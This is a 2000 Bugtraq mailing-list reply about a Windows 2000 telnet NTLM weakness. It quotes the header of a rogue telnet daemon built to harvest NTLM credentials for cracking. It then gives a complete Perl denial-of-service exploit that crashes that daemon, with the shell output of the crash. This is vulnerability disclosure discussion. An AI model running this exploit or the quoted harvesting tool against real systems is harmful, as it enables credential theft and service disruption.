[16765] in bugtraq
Re: Win2k Telnet.exe malicious server vulnerability
daemon@ATHENA.MIT.EDU (Jim Paris)
Thu Sep 14 12:43:19 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-Id: <20000914120408.A18643@jtan.com>
Date: Thu, 14 Sep 2000 12:04:09 -0400
Reply-To: Jim Paris <jim@JTAN.COM>
From: Jim Paris <jim@JTAN.COM>
X-To: monti <monti@USHOST.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.BSF.3.96.1000913140710.26686A-201000@mournblade>; from
monti@USHOST.COM on Wed, Sep 13, 2000 at 03:13:29PM -0500
> /* NTLM telnetD v0.8
>
> Snarfs NTLM challenge/response by convincing w2k telnet client to
> auto-authenticate.
> Outputs auth-data in LophtCrack sniff format on stdout.
>
> compile: gcc -o w2kteld ntlm_telnetd.c
> run: ./w2kteld
>
> Then wait for w2k to telnet to you.
> for the impatient, there are always ways of making w2k telnet!
...
<snip>
And if you happen to get bitten by this rogue server,
it must be time for a friendly little DoS against it.
(rp->upos is used as a pointer modifier without checking its bounds)
sardegna:~$ ./ntlm_telnetd -l 1234 & ( sleep 1; perl killit.pl )
[1] 23535
[ Fake NTLM Telnet Daemon - by yeza ]
Listening on port 1234
Awaiting connections
Connection from: 127.0.0.1
Got NTLM response token
[1]+ Segmentation fault ./ntlm_telnetd -l 1234
sardegna:~$
We are so batman. And now I'm late for class. (grr, 6.003)
-jim
#!/usr/bin/perl -w
#
# anti-ntlm-telnetd by jim@jtan
use IO::Socket;
my($s, $msg);
$s=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'localhost:1234') or die;
$s->recv($msg,1024);
$s->send("\xff\xfb\x25");
$s->recv($msg,1024);
$s->send("\xff\xfd");
$s->send("A"x7 . # foo
"\xFF" . # length (passed to gettoken)
"A"x7 . # bar
"NTLMSSP\0\x03" . # protocol and type
"A"x29 . # baz
"\xDE\xAD\xBE\xEF"); # rp->upos
